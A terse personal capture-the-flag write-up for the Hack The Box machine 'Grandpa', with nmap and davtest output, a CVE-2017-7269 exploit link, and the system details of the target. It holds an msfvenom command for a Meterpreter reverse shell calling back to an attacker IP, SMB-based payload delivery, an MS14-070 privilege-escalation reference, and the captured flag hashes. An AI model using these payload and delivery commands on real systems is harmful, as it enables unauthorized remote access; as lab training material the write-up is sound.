Grandpa - 12.08.2021

NMap

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -T4 -p- 10.10.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 14:51 CEST
Nmap scan report for 10.10.10.14
Host is up (0.073s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Date: Thu, 12 Aug 2021 13:05:01 GMT
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

DavTest

┌──(kali㉿kali)-[~/htb/grandpa]
└─$ davtest -url http://10.10.10.14
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.14
********************************************************
NOTE    Random string for this session: nBfWUYy
********************************************************
 Creating directory
MKCOL           FAIL
********************************************************
 Sending test files
PUT     cgi     FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     jhtml   FAIL
PUT     html    FAIL
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     shtml   FAIL
PUT     php     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL

********************************************************
/usr/bin/davtest Summary:

Maszyna to Windows Server 2003.

Microsoft-IIS/6.0 jest podatna na CVE-2017-7269

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 0 Hours, 18 Minutes, 10 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 795 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,329 MB
Page File: In Use:         141 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

Transfer files by SMB without wget curl

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.19 lport=9003 -f exe > shell.exe
impacket-smbserver smb www/
copy \\10.10.14.19\smb\shell.exe \windows\temp\pp\shell.exe


start shell.exe

Privilages Escalation

Msfconsole

MS14-070

https://www.exploit-db.com/exploits/35936

user.txt

bdff5ec67c3cff017f2bedc146a5d869

root.txt

9359e905a2c35f861f6a57cecf28bb7b